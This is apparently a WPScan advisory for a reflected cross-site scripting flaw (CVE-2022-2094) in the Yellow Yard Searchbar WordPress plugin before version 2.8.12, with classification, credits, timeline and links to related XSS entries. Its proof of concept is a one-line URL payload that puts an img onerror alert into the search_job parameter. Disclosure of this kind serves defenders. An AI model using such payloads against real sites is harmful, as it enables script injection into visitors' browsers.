WordPress Plugin Vulnerabilities

Yellow Yard Searchbar < 2.8.12 - Reflected Cross-Site Scripting

Description

The plugin does not escape some URL parameters before outputting them back to the user, leading to Reflected Cross-Site Scripting

Proof of Concept

On a page where the yy_filter shortcode is embed, append /?search_job="><img+src%3Dx+onerror%3Djavascript%3Aalert%28%60HoiWPScan%60%29>

Affects Plugins

Plugin icon
yellow-yard
Fixed in 2.8.12

References

CVE
CVE-2022-2094

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.5 (high)

Miscellaneous

Original Researcher
Victor Pasman
Submitter
Victor Pasman
Verified
Yes
WPVDB ID
c9a106e1-29ae-47ad-907b-01086af3d3fb

Timeline

Publicly Published
2022-07-01 (about 1 years ago)
Added
2022-07-01 (about 1 years ago)
Last Updated
2023-04-12 (about 1 years ago)

Other

Published
Title
Published
2012-06-06
Title
Wassup < 1.8.3.1 - XSS
Published
2014-08-01
Title
Duplicate Post 2.5 - options-general.php post Parameter Reflected XSS
Published
2023-05-22
Title
Duplicator Pro < 4.5.11.1 - Unauthenticated Reflected XSS
Published
2021-12-21
Title
Simple Download Monitor < 3.9.11 - Contributor+ Stored Cross-Site Scripting via Shortcodes
Published
2023-04-19
Title
WCP Contact Form <= 3.1.0 - Reflected XSS